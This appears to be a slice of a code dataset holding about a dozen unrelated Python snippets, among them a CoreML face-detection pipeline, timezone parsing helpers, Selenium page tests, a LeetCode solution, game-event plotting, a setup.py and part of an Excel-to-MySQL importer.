blazeface_coreml._spec.description.output[2].type.multiArrayType.shape.extend([896, 12])
blazeface_coreml._spec.description.output[2].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
nms_spec = coremltools.proto.Model_pb2.Model()
nms_spec.specificationVersion = 3
for i in range(2):
blazeface_output = blazeface_coreml._spec.description.output[i].SerializeToString()
nms_spec.description.input.add()
nms_spec.description.input[i].ParseFromString(blazeface_output)
nms_spec.description.output.add()
nms_spec.description.output[i].ParseFromString(blazeface_output)
nms_spec.description.output[0].name = "confidence"
nms_spec.description.output[1].name = "coordinates"
output_sizes = [1, 4]
for i in range(2):
ma_type = nms_spec.description.output[i].type.multiArrayType
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[0].lowerBound = 0
ma_type.shapeRange.sizeRanges[0].upperBound = -1
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[1].lowerBound = output_sizes[i]
ma_type.shapeRange.sizeRanges[1].upperBound = output_sizes[i]
del ma_type.shape[:]
nms = nms_spec.nonMaximumSuppression
nms.confidenceInputFeatureName = "box_confidence"
nms.coordinatesInputFeatureName = "boxes"
nms.confidenceOutputFeatureName = "confidence"
nms.coordinatesOutputFeatureName = "coordinates"
nms.iouThresholdInputFeatureName = "iouThreshold"
nms.confidenceThresholdInputFeatureName = "confidenceThreshold"
default_iou_threshold = 0.5
default_confidence_threshold = 0.75
nms.iouThreshold = default_iou_threshold
nms.confidenceThreshold = default_confidence_threshold
nms.stringClassLabels.vector.extend(["face"])
nms_model = coremltools.models.MLModel(nms_spec)
input_features = [("input_image", datatypes.Array(3,128,128)), ("iouThreshold", datatypes.Double()),
("confidenceThreshold", datatypes.Double())] #cannot directly pass imageType as input type here.
output_features = [ "confidence", "coordinates"]
pipeline = Pipeline(input_features, output_features)
pipeline.add_model(blazeface_coreml._spec)
pipeline.add_model(nms_model._spec)
pipeline.spec.description.input[0].ParseFromString(blazeface_coreml._spec.description.input[0].SerializeToString())
pipeline.spec.description.input[1].type.isOptional = True
pipeline.spec.description.input[2].type.isOptional = True
pipeline.spec.description.output[0].ParseFromString(nms_model._spec.description.output[0].SerializeToString())
pipeline.spec.description.output[1].ParseFromString(nms_model._spec.description.output[1].SerializeToString())
final_model = coremltools.models.MLModel(pipeline.spec)
final_model.save("./coreml_models/blazeface_pipeline.mlmodel")
inp_image = Image.open("./sample.jpg")
inp_image = inp_image.resize((128, 128))
predictions = final_model.predict({'input_image': inp_image}, useCPUOnly=True)
print(predictions) |
13,134 | 03bac25624fd29f5dbbcbf7454556ce420f58e20 | import time
import datetime
import cflw代码库py.cflw时间 as 时间
def f解析日期时间(a):
"""转换成time.struct_time"""
if isinstance(a, time.struct_time):
return a
elif isinstance(a, datetime.datetime):
return a.timetuple()
else:
raise TypeError("无法解析的类型")
def f解析时区(a):
"""把datetime.tzinfo对象原封不动返回
把"时区名±时:分"解析成datetime.timezone对象"""
if isinstance(a, datetime.tzinfo):
return a
elif isinstance(a, 时间.S时区):
return a.ft标准库时区()
elif type(a) == str:
v符号位置 = max(a.find("+"), a.find("-"))
if v符号位置 < 0:
raise ValueError("格式错误, 找不到正负号")
elif v符号位置: #v符号位置 > 0
v时区名 = a[: v符号位置].strip()
else: #v符号位置 == 0
v时区名 = None
v冒号位置 = a.find(":", v符号位置)
if v冒号位置 < 0:
v时 = int(a[v符号位置+1 :])
v分 = 0
else:
v时 = int(a[v符号位置+1 : v冒号位置])
v分 = int(a[v冒号位置+1 :])
return datetime.timezone(datetime.timedelta(hours = v时, minutes = v分), v时区名)
else:
raise TypeError("无法解析的类型")
def f拆分时区(a时区):
"""把datetime.tzinfo转换成(时区名: str, 正号: bool, 时: int, 分: int)"""
v总秒 = a时区.utcoffset(None).total_seconds()
if v总秒 < 0:
v符号 = False
v总秒 = -v总秒
else:
v符号 = True
v时分秒 = 时间.f总秒拆成时分秒(v总秒)
return a时区.tzname(None), v符号, v时分秒[0], v时分秒[1]
def f解析并拆分时区(a时区):
v时区 = f解析时区(a时区)
return f拆分时区(v时区)
class I时间显示:
def f显示_时间(self):
"返回 time.struct_time 对象"
raise NotImplementedError()
def f显示_时区(self):
"返回 datetime.timezone 对象"
raise NotImplementedError()
class I时间配置:
c模式名 = "时间配置模式"
def fs为系统时间(self):
"""把设备时间时区设置为当前系统的时间时区"""
v时区 = 时间.S时区.fc系统时区()
self.fs时区(v时区)
self.fs日期时间(time.localtime())
def fs日期时间(self, a日期时间):
raise NotImplementedError()
def fs时区(self, a时区):
"""支持的类型: datetime.timezone
支持的字符串格式: "时区名±时:分" """
raise NotImplementedError() |
13,135 | 39796e6309e0e99e32b0cb513c0144780847dcc9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from . import MonoSubCipher
from utils.alphabet import *
class AffineCipher(MonoSubCipher):
def __init__(self, alphabet, m, b):
""" multiply mx + b """
# We're cheating here by not actually having the decryption method use the "inverse" argument
transformed = alphabet.affinal(m, b)
super(AffineCipher, self).__init__(alphabet, transformed)
|
13,136 | 801a861f2d8fab540fb6225be46064eb4f81564a | # -*- coding:utf-8 -*-
from titan import tt_check
from taocheM.base_m import Base
from taocheM.config_m import TestConfig
from taocheM.locator_m import CarDetail_Locator
from time import sleep
from titan.tt_log import LOG
from titan import SeleniumDriver
detail_url = 'https://m.taoche.com/buycar/b-dealermd233736134t.html'
# 详情页点击『检测报告』检查
class Report(Base):
def test_report_title(self):
"""测试检测报告title显示的是否正确@author:zhangyanli"""
self.driver.get(detail_url)
sleep(2)
self.driver.execute_script("window.scrollTo(0, 1300)")
report_title = self.driver.find_element(CarDetail_Locator.REPORT_TITLE).text
tt_check.assertEqual("检测报告", report_title, "检测报告tab的title,期望是检测报告,实际是%s" % report_title)
def test_report_type(self):
"""测试检测报告各类型显示的是否正确@author:zhangyanli"""
self.driver.get(detail_url)
sleep(2)
self.driver.execute_script("window.scrollTo(0, 1300)")
report_type = self.driver.find_element(CarDetail_Locator.REPORT_TYPE).find_elements_by_class_name('display-flex')
# for i in range(len(report_type)):
# LOG.info(report_type[i].text)
for i in range(len(report_type)):
config_value = report_type[i].find_elements_by_tag_name('div')
keyval = ""
for j in range(len(config_value)):
yu = j % 2
if(yu == 0):
keyval = config_value[j].text
else:
keyval = keyval + ":" + config_value[j].text
print(keyval)
keyval = ""
|
13,137 | aa51f8cc9a11e4b4242d1ba15bd82113bd3fe4b9 | """
Given a char array representing tasks CPU need to do. It contains capital letters A to Z where different letters represent different tasks.Tasks could be done without original order. Each task could be done in one interval. For each interval, CPU could finish one task or just be idle.
However, there is a non-negative cooling interval n that means between two same tasks, there must be at least n intervals that CPU are doing different tasks or just be idle.
You need to return the least number of intervals the CPU will take to finish all the given tasks.
Example 1:
Input: tasks = ["A","A","A","B","B","B"], n = 2
Output: 8
Explanation: A -> B -> idle -> A -> B -> idle -> A -> B.
Note:
The number of tasks is in the range [1, 10000].
The integer n is in the range [0, 100].
"""
“”“
Time O(N)
Space O(1)
先统计数组中各个任务出现的次数。优先安排次数最多的任务。次数最多的任务安排完成之后所需的时间间隔为(max(次数)-1)*(n+1)+ p(频率最高出现的p个数p>=1)。其余任务直接插空即可。
https://www.youtube.com/watch?v=YCD_iYxyXoo
特殊情况:如果不需要插入任何idle就能把所有task安排完,那么返回的就是task的长度
””“
class Solution(object):
def leastInterval(self, tasks, n):
counts = [0] * 26
p = 0
for i in tasks:
counts[ord(i) - ord('A')] += 1
max_count = max(counts)
for count in counts:
if count == max_count:
p += 1
ans = (max_count - 1) * (n + 1) + p
return max(ans, len(tasks)) #这里很容易犯错,要考虑不需要任何idle, 就可以满足的情况!!
|
13,138 | a8b3fa2e3254b1d8037fd787dcf67cf43227c261 | import math
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats
data = pd.read_pickle("data.pkl")
# print(str(data))
# columns=["game_mode", "observability", "agents", "game_seed", "instance", "event_id", "event_data"]
# Event id: [bomb, death, pickup]
# Event data bomb: (tick, relative_tick, agent_id, x, y)
# Event data death: (tick, relative_tick, agent_id, x, y, killer, stuck)
# Event data pickup: (tick, relative_tick, agent_id, x, y, pickup)
agent_mapping = {2: "OSLA", 3: "RuleBased", 4: "RHEA", 6: "MCTS"}
agents = [2, 3, 4, 6]
mode_mapping = {0: "FFA", 1: "TEAM"}
game_seeds = [93988, 19067, 64416, 83884, 55636, 27599, 44350, 87872, 40815, 11772, 58367, 17546, 75375, 75772, 58237,
30464, 27180, 23643, 67054, 19508]
pick_ups = ["CAN KICK", "BLAST STRENGTH", "AMMO"]
obs_options = [1, 2, 4, -1]
# colors = {2: "b", 3: "orange", 4: "g", 6: "r"}
colors = ["b", "orange", "g", "r"]
def suicide_query(game_mode=0, observability=-1, game_seed=-1, agent=-1):
"""
Calculates the number of suicides for a type of agent given game mode, observability, and game seed.
If game seed passed is -1, then all game seeds are aggregated.
"""
event_id = "death"
# Keep only those games within given configuration
if game_seed != -1:
selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) &
(data['game_seed'] == game_seed)]
else:
selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)]
if agent != -1:
for index, row in selection.iterrows():
if agent not in row["agents"]:
selection.drop(index, inplace=True)
# print(selection.size)
team_kill_count = []
ngames = 0 # Number of games in which this agent dies
suicides = 0 # Number of games in which this agent commits suicide
events_per_sample = []
team_kills = 0
# Iterate through selected game data
for index, row in selection.iterrows():
if agent in row["agents"] and row['event_id'] == event_id: # This agent played in the game
# Find its agent ID depending on its position in the agent list. There may be more than 1 agent of this
# type in the game, so iterate over all and check individually.
ll = row["agents"]
indices = [i for i, el in enumerate(ll) if el == agent]
for agent_id in indices:
# teammate = (agent_id + 2) % 4
sample_event_counter = 0
for event in row["event_data"]:
if event["agent_id"] == agent_id: # This agent dies
if event["killer"] == agent_id: # Suicide
sample_event_counter += 1
# if event["killer"] == teammate: # Killed by teammate
# team_kills += 1
# if event["agent_id"] == teammate: # Teammate dies
# if event["killer"] == agent_id: # Killed by this agent
# team_kill_count += 1
ngames += 1
events_per_sample.append(sample_event_counter)
suicides += sample_event_counter
# suicide_count.append(100*suicides/ngames) # Showing percentage of game suicides
# team_kill_count.append(100*team_kills/games)
# percentage = 100 * suicides / ngames
# mean = ngames * (percentage / 100)
# variance = mean * (1 - (percentage / 100))
# std_dev = math.sqrt(variance)
# std_err = std_dev / math.sqrt(ngames)
# h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95 confidence interval
# return percentage, h
# print(events_per_sample)
mean = suicides/ngames
variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample)
std_dev = math.sqrt(variance)
std_err = std_dev/math.sqrt(len(events_per_sample))
h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95% confidence interval
return mean * 100, h * 100 # , team_kill_count
def event_count_query(event_id, game_mode=0, observability=-1, game_seed=-1, agent=-1):
# Keep only those games within given configuration
if game_seed != -1:
selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) &
(data['game_seed'] == game_seed)]
else:
selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)]
if agent != -1:
for index, row in selection.iterrows():
if agent not in row["agents"]:
selection.drop(index, inplace=True)
ngames = 0 # Number of games in which this agent plays bombs
event_counter = 0 # Number of bombs this agent places
events_per_sample = []
# Iterate through selected game data
for index, row in selection.iterrows():
if agent in row["agents"] and row['event_id'] == event_id: # This agent played in the game
ll = row["agents"]
indices = [i for i, el in enumerate(ll) if el == agent]
for agent_id in indices:
sample_event_counter = 0
for event in row["event_data"]:
if event["agent_id"] == agent_id: # This agent places bomb
sample_event_counter += 1
ngames += 1
events_per_sample.append(sample_event_counter)
event_counter += sample_event_counter
mean = event_counter/ngames
variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample)
std_dev = math.sqrt(variance)
std_err = std_dev/math.sqrt(len(events_per_sample))
h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95% confidence interval
return event_counter/ngames, h
def plot_suicides(mode=0):
plot_data = [[] for _ in range(len(agent_mapping))]
stderr_data = [[] for _ in range(len(agent_mapping))]
for agent in agents:
for o in obs_options:
suicide_rate, stderr = suicide_query(game_mode=mode, observability=o, agent=agent)
print("Suicides in game mode " + mode_mapping[mode] + ", observability " + str(o))
plot_data[agents.index(agent)].append(suicide_rate)
stderr_data[agents.index(agent)].append(stderr)
print(agent_mapping[agent] + ": " + str(suicide_rate))
x = [1, 2, 4, 11]
xt = ['PO:1', 'PO:2', 'PO:4', '$\infty$']
for d in range(len(plot_data)):
plt.plot(x, plot_data[d], label=agent_mapping[agents[d]], color=colors[d])
y_minus_error = np.subtract(plot_data[d], stderr_data[d])
y_plus_error = np.add(plot_data[d], stderr_data[d])
plt.fill_between(x, y_minus_error, y_plus_error, alpha=0.2, edgecolor=None, facecolor=colors[d], linewidth=0, antialiased=True)
plt.xticks(x, xt)
plt.legend()
plt.xlabel("Vision range", fontsize=16)
plt.ylabel("suicide %", fontsize=16)
plt.yticks(np.arange(0.0, 101.0, 10.0))
plt.grid(color='lightgrey', linestyle='--', linewidth=1)
plt.savefig(f'suicide_{mode}.png')
plt.show()
def plot_event_count(event_name, mode=0):
plot_data = [[] for _ in range(len(agent_mapping))]
std_err_data = [[] for _ in range(len(agent_mapping))]
for agent in agents:
for o in obs_options:
events_per_game, std_err = event_count_query(event_name, game_mode=mode, observability=o, agent=agent)
print("Bombs in game mode " + mode_mapping[mode] + ", observability " + str(o))
plot_data[agents.index(agent)].append(events_per_game)
std_err_data[agents.index(agent)].append(std_err)
print(agent_mapping[agent] + ": " + str(events_per_game) + " std.err: " + str(std_err))
x = [1, 2, 4, 11]
xt = ['PO:1', 'PO:2', 'PO:4', '$\infty$']
for d in range(len(plot_data)):
plt.plot(x, plot_data[d], label=agent_mapping[agents[d]], color=colors[d])
y_minus_error = np.subtract(plot_data[d], std_err_data[d])
y_plus_error = np.add(plot_data[d], std_err_data[d])
plt.fill_between(x, y_minus_error, y_plus_error, alpha=0.2, edgecolor=None, facecolor=colors[d], linewidth=0, antialiased=True)
plt.xticks(x, xt)
plt.legend()
plt.xlabel("Vision range", fontsize=16)
plt.ylabel(f"{event_name}s per game", fontsize=16)
if event_name == "bomb":
plt.yticks(np.arange(0.0, 51.0, 5.0))
elif event_name == "pickup":
plt.yticks(np.arange(0.0, 6.0, 1.0))
plt.grid(color='lightgrey', linestyle='--', linewidth=1)
plt.savefig(f'{event_name}_{mode}.png')
plt.show()
def main():
plot_suicides(0) # FFA
# plot_suicides(1) # TEAM
# plot_event_count("bomb", 0)
# plot_event_count("bomb", 1)
# plot_event_count("pickup", 0)
# plot_event_count("pickup", 1)
if __name__ == "__main__":
main()
|
13,139 | 35470278e2e9199daf8ccfcb68e645fa8c49bad4 | from selenium.webdriver.common.by import By
class Locator:
"""Locator objects for finding Selenium WebElements"""
def __init__(self, l_type, selector):
self.l_type = l_type
self.selector = selector
def parameterize(self, *args):
self.selector = self.selector.format(*args)
class SearchPageLocators:
"""Class for google search page selectors"""
SEARCH_BAR = Locator(By.XPATH, "//input[@type='text']")
SEARCH_RESULT = Locator(By.XPATH, "//a[@href='{}']")
|
13,140 | c95cff27a8873fd039a4e9d8e65a147ae119e9c8 | # (c) 2019-2020 Mikhail Paulyshka
# SPDX-License-Identifier: MIT
import ctypes
import logging
import os
import platform
from .wgc_constants import USER_PROFILE_URLS
### Platform
def get_platform() -> str:
system = platform.system()
if system == 'Windows':
return 'windows'
if system == 'Darwin':
return 'macos'
logging.error('get_platform: unknown platform %s' % system)
return 'unknown'
### Process
DETACHED_PROCESS = 0x00000008
### Mutex
SYNCHRONIZE = 0x00100000
MUTANT_QUERY_STATE = 0x0001
STANDARD_RIGHTS_REQUIRED = 0x000F0000
MUTEX_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | MUTANT_QUERY_STATE
def is_mutex_exists(mutex_name) -> bool:
kerneldll = ctypes.windll.kernel32
mutex_handle = kerneldll.OpenMutexW(MUTEX_ALL_ACCESS, 0, str(mutex_name))
if mutex_handle != 0:
kerneldll.CloseHandle(mutex_handle)
return True
return False
### FS
def scantree(path):
"""Recursively yield DirEntry objects for given directory."""
for entry in os.scandir(path):
if entry.is_dir(follow_symlinks=False):
yield from scantree(entry.path)
else:
yield entry
### Names
def fixup_gamename(name):
if name == 'STD2':
return 'Steel Division 2'
return name
def get_profile_url(game_id: str, realm: str, user_id: str) -> str:
if game_id not in USER_PROFILE_URLS:
logging.error('wgc_helper/get_profile_url: unknown game_id %s' % game_id)
return None
game_urls = USER_PROFILE_URLS[game_id]
if realm not in game_urls:
logging.error('wgc_helper/get_profile_url: unknown realm %s' % realm)
return '%s/%s' % (game_urls[realm], user_id)
|
13,141 | 4746510a1b1f34132cfad80da1547d00b687c119 | # Copyright 2017 Janos Czentye, Balazs Nemeth, Balazs Sonkoly
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from nffg import VERSION
MODULE_NAME = "nffg"
setup(name=MODULE_NAME,
version=VERSION,
description="Network Function Forwarding Graph",
author="Janos Czentye, Balazs Nemeth, Balazs Sonkoly",
long_description="Python-based implementation of "
"Network Function Forwarding Graph used by ESCAPE",
classifiers=[
'Development Status :: 4 - Beta',
"Intended Audience :: Telecommunications Industry",
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules'
],
keywords='networking NFV BiSBiS forwarding',
url="http://sb.tmit.bme.hu/escape",
author_email="{name}.{name}@tmit.bme.hu",
maintainer="Janos Czentye",
maintainer_email="czentye@tmit.bme.hu",
license="Apache 2.0",
install_requires=[
"networkx>=1.11"
],
package_dir={MODULE_NAME: "."},
packages=[MODULE_NAME],
scripts=["nffg_diff.py"],
include_package_data=True,
zip_safe=False)
|
13,142 | 5f391511d3b4ced69ad0dff37b573f1dd19945ef | ksql="""create stream clickevents(
uri int,
)
WITH(KAFKA_TOPIC="",VALUE_FORMAT="AVRO")
""" |
13,143 | c8a676327d51f65f084217b43de089924c2df86a | import random
lista = (0, 1, 2, 3, 4, 5)
num1 = random.choice(lista)
#print(num1)
print('Pensei em um numero, tente adivinhar...')
num2 = int(input('Digite um numero de 1 a 5: '))
print('voce acertou o numero escolido!' if num1==num2 else 'voce errou o numero é {}'.format(num1))
print('Parabens!!!'if num1==num2 else'Tente outro vez!')
#---------
# ---ou---
#---------
from random import randint
from time import sleep
computador = randint(0, 5) # busca um numero aleatório no intervalo
print('-=-'*20)
print('Vou pensar em um numero entre 0 e 5 tente advinhar: ')
print('-=-'*20)
jogador =int(input('Digite um numero de 1 a 5: ')) # jogador tenta advinhar
print('Processando...')
sleep(3)
if jogador == computador:
print('Parabéns voce conseguiu me vencer!')
else:
print('Ganhei! eu pensei no número {} e nao no {}'.format(computador, jogador))
|
13,144 | fdd6a9fb7e1f297f3560ccd4ca2e29eec3e4956d | from cep_price_console.utils.utils import is_path_exists_or_creatable, creation_date
from cep_price_console.db_management.server_utils import mysql_login_required
from cep_price_console.utils.log_utils import debug, CustomAdapter
from cep_price_console.utils.excel_utils import Workbook
import cep_price_console.db_management.server_utils as server_utils
from cep_price_console.utils import config
from sqlalchemy.schema import CreateSchema
from sqlalchemy.sql import text
# from sqlalchemy.ext.declarative import DeferredReflection
# noinspection PyUnresolvedReferences
from sqlalchemy import exc, and_, select, or_, func
import importlib
import logging
import datetime
import os
import csv
import textwrap
reflected = False
creation_module = None
@debug(lvl=logging.DEBUG, prefix='')
def get_creation_module():
global creation_module
if creation_module is None:
for table in list(server_utils.mysql_base.metadata.tables.keys()):
server_utils.mysql_base.metadata.remove(server_utils.mysql_base.metadata.tables[table])
creation_module = importlib.import_module("cep_price_console.db_management.ARW_PRF_Creation")
return creation_module
else:
return creation_module
class ArwPrfImporter(object):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.DEBUG, prefix='')
@mysql_login_required
def __init__(self, relative_filename):
self.relative_filename = relative_filename
self.wb_cls = Workbook(relative_filename)
self.session = server_utils.mysql_session_maker()
@debug(lvl=logging.DEBUG)
def investigate_arw_prf_xl(self):
for sheet_name in self.wb_cls.ws_lst:
prf_obj = self.ws_format_check(sheet_name)
if prf_obj is not None:
self.field_instantiation(prf_obj)
self.wb_cls.wb.unload_sheet(sheet_name)
@debug(lvl=logging.DEBUG)
def ws_format_check(self, sheet_name):
# PrimaryReportFile.clear_dict()
formatting_error = False
tbl_init_dict = {}
self.wb_cls.ws_sel = sheet_name
for col in range(1, self.wb_cls.col_count + 1):
col_dict = dict(
arw_or_static=None,
table_name=None,
filepath_or_master_table_name=None,
)
# Table-Level loop
# Row 1 in every spreadsheet should have Y/N values signifying that the column
# be considered for table import. Import only the columns w/ Y values.
for row in range(1, 4):
cell_val = self.wb_cls.fetch_value(row, col).formatted_value
try:
cell_val = str(cell_val).strip()
except ValueError:
ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Value not a string: {3}"
.format(sheet_name, col, str(row), cell_val))
else:
if row == 1:
if cell_val in ('Y', 'S', 'N', 'MySQL File?'):
col_dict['arw_or_static'] = cell_val
else:
formatting_error = True
ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, First row value not "
"'Y', 'S', 'N' or 'MySQL File?': {3}".format(sheet_name, col,
row, cell_val))
break
elif row == 2:
if self.wb_cls.fetch_value(1, col).formatted_value != 'S':
if cell_val.strip() != "N/A":
if cell_val[-4:].upper() == ".CSV":
fileroot = config.config["directory"]["arw_export_dir"]
filepath = os.path.join(fileroot, cell_val)
ArwPrfImporter.logger.log(logging.DEBUG, "filepath: {0}".format(filepath))
if not is_path_exists_or_creatable(filepath):
formatting_error = True
ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Invalid "
"filepath: {3}".format(sheet_name, col, row,
cell_val))
break
else:
col_dict['filepath_or_master_table_name'] = filepath
else:
formatting_error = True
ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, "
"Second row value must be a filepath or "
"'N/A': {3}".format(sheet_name, col, row, cell_val))
break
elif cell_val.strip() == "N/A":
col_dict['filepath_or_master_table_name'] = cell_val
elif self.wb_cls.fetch_value(1, col).formatted_value == 'S':
col_dict['filepath_or_master_table_name'] = cell_val
elif row == 3:
# table_name = None
ArwPrfImporter.logger.log(logging.NOTSET,
"Sheet Name: {0}, Column: {1}, Row: {2}, "
"ARW Column List: {3}, Cell Value: {4}"
.format(sheet_name, col, row, arw_col_list.get(str(col)), cell_val))
if col <= 22:
if arw_col_list.get(str(col)) != cell_val:
formatting_error = True
ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Column Ordering "
"Error: {3}".format(sheet_name, col, row, cell_val))
break
elif arw_col_list.get(str(col)) == cell_val:
col_dict['table_name'] = cell_val
else:
col_dict['table_name'] = cell_val
if formatting_error:
break
# ArwPrfImporter.logger.log(logging.NOTSET, "Sheet Name: {0}, Column: {1}".format(sheet_name, col))
# for str_key in col_dict.keys():
# str_value = col_dict.get(str_key)
# ArwPrfImporter.logger.log(logging.DEBUG, "Key: {0}, Value: {1}".format(str_key, str_value))
if col > 22:
tbl_init_dict[str(col)] = col_dict
if not formatting_error:
prf_obj = PrimaryReportFile(self.session, sheet_name)
for col_key in sorted(tbl_init_dict.keys(), key=lambda x: int(x)):
col_value = tbl_init_dict.get(col_key)
ArwPrfImporter.logger.log(logging.NOTSET, "Key: {0}, Value: {1}".format(col_key, col_value.values()))
prf_obj.tbl_init_dict = tbl_init_dict
self.table_instantiation(prf_obj)
return prf_obj
else:
return None
# self.wb_cls.wb.unload_sheet(sheet_name)
@debug(lvl=logging.DEBUG)
def table_instantiation(self, prf_obj):
for col in sorted(prf_obj.tbl_init_dict.keys(), key=lambda x: int(x)):
col_dict = prf_obj.tbl_init_dict.get(col)
if col_dict.get('arw_or_static') == 'Y':
current_table = CurrentTable(
session=self.session,
prf_name=prf_obj.filename,
prf_col=int(col),
base_table_name=col_dict.get('table_name'),
table_name=col_dict.get('table_name') + "_01_current",
filepath=col_dict.get('filepath_or_master_table_name'))
prf_obj.current_tbl_dict[col] = current_table
archive_table = ArchiveTable(
session=self.session,
prf_name=prf_obj.filename,
prf_col=int(col),
base_table_name=col_dict.get('table_name'),
table_name=col_dict.get('table_name') + "_02_archive",
filepath=col_dict.get('filepath_or_master_table_name'))
prf_obj.archive_tbl_dict[col] = archive_table
elif col_dict.get('arw_or_static') == 'S':
static_table = StaticTable(
session=self.session,
prf_name=prf_obj.filename,
prf_col=int(col),
base_table_name=col_dict.get('table_name'),
table_name=col_dict.get('table_name') + "_01_static",
master_table_name=col_dict.get('filepath_or_master_table_name'))
prf_obj.static_tbl_dict[col] = static_table
@debug(lvl=logging.DEBUG)
def field_instantiation(self, prf_obj):
self.wb_cls.ws_sel = prf_obj.sheetname
col_num_list = list(prf_obj.current_tbl_dict.keys()) + list(prf_obj.archive_tbl_dict.keys()) + list(
prf_obj.static_tbl_dict.keys())
col_num_list = [int(x) for x in list(set(col_num_list))]
# print(col_num_list)
for row in range(4, self.wb_cls.row_count + 1):
try:
new_field = Field(
arw_name=self.wb_cls.fetch_value(row, "A").formatted_value,
logical_field=self.wb_cls.fetch_value(row, "B").formatted_value,
tag=self.wb_cls.fetch_value(row, "C").formatted_value,
length=self.wb_cls.fetch_value(row, "D").formatted_value,
nested=self.wb_cls.fetch_value(row, "E").formatted_value,
desc=self.wb_cls.fetch_value(row, "F").formatted_value,
column_name=self.wb_cls.fetch_value(row, "H").formatted_value,
data_type=self.wb_cls.fetch_value(row, "I").formatted_value,
fill=self.wb_cls.fetch_value(row, "J").formatted_value,
primary_key=self.wb_cls.fetch_value(row, "K").formatted_value,
nullable=self.wb_cls.fetch_value(row, "L").formatted_value,
unique=self.wb_cls.fetch_value(row, "M").formatted_value,
index=self.wb_cls.fetch_value(row, "N").formatted_value,
binary_col=self.wb_cls.fetch_value(row, "O").formatted_value,
auto_incremental=self.wb_cls.fetch_value(row, "P").formatted_value,
generated=self.wb_cls.fetch_value(row, "Q").formatted_value,
static_key=self.wb_cls.fetch_value(row, "R").formatted_value,
dflt_exp=self.wb_cls.fetch_value(row, "U").raw_raw_val,
notes=self.wb_cls.fetch_value(row, "A").formatted_value,
)
except ValueError as err:
if not err.args:
err.args = ('',)
err.args = ("Sheet Name: {0}, Row: {1}"
.format(prf_obj.sheetname,
row),
) + err.args
ArwPrfImporter.logger.error(err.args)
else:
for col in sorted(col_num_list):
try:
order = int(self.wb_cls.fetch_value(row, col).formatted_value)
except ValueError:
ArwPrfImporter.logger.log(
logging.DEBUG, "Value is not an integer. Field not appended to any dictionary.")
else:
current_tbl_obj = prf_obj.current_tbl_dict.get(str(col))
if current_tbl_obj is not None:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
col, current_tbl_obj.table_name))
current_tbl_obj.fields[str(order)] = new_field
else:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Column: {0}. Current Table Dictionary. Get returned 'None'".format(col))
archive_tbl_obj = prf_obj.archive_tbl_dict.get(str(col))
if archive_tbl_obj is not None:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
col, archive_tbl_obj.table_name))
archive_tbl_obj.fields[str(order)] = new_field
else:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Column: {0}. Archive Table Dictionary. Get returned 'None'".format(col))
static_tbl_obj = prf_obj.static_tbl_dict.get(str(col))
if static_tbl_obj is not None:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
col, static_tbl_obj.table_name))
static_tbl_obj.fields[str(order)] = new_field
else:
ArwPrfImporter.logger.log(
logging.DEBUG,
"Row: {1}, Column: {0}. Static Table Dictionary. Get returned 'None'".format(col, row))
tbl_obj_lst = \
list(prf_obj.current_tbl_dict.values()) + \
list(prf_obj.archive_tbl_dict.values()) + \
list(prf_obj.static_tbl_dict.values())
for tbl_obj in tbl_obj_lst:
tbl_obj.post_field_instantiation()
# self.wb_cls.wb.unload_sheet(prf_obj.sheetname)
@debug(lvl=logging.DEBUG)
def write_module_file(self, creation=False, mapping=False):
if bool(PrimaryReportFile.prf_dict.values()):
filename = None
if sum([creation, mapping]) != 1:
raise ValueError
elif creation:
filename = config.SOURCE_PATH / "cep_price_console" / "db_management" / "ARW_PRF_Creation.py"
with filename.open("w") as module_file:
print("from sqlalchemy.ext.declarative import DeferredReflection", file=module_file)
print("from sqlalchemy import Column, Table, func", file=module_file)
print("from sqlalchemy.sql import case, and_, or_, literal", file=module_file)
print("from sqlalchemy.ext.hybrid import hybrid_property", file=module_file)
print("from sqlalchemy.types import Date, DateTime, Integer, Numeric, String, Time",
file=module_file)
print("from sqlalchemy.dialects.mysql import LONGTEXT", file=module_file)
print("import cep_price_console.db_management.server_utils as server_utils\n\n", file=module_file)
elif mapping:
filename = config.SOURCE_PATH / "cep_price_console" / "db_management" / "ARW_PRF_Mapping.py"
with filename.open("w") as module_file:
print("from sqlalchemy.ext.declarative import DeferredReflection", file=module_file)
print("from sqlalchemy import Table, func", file=module_file)
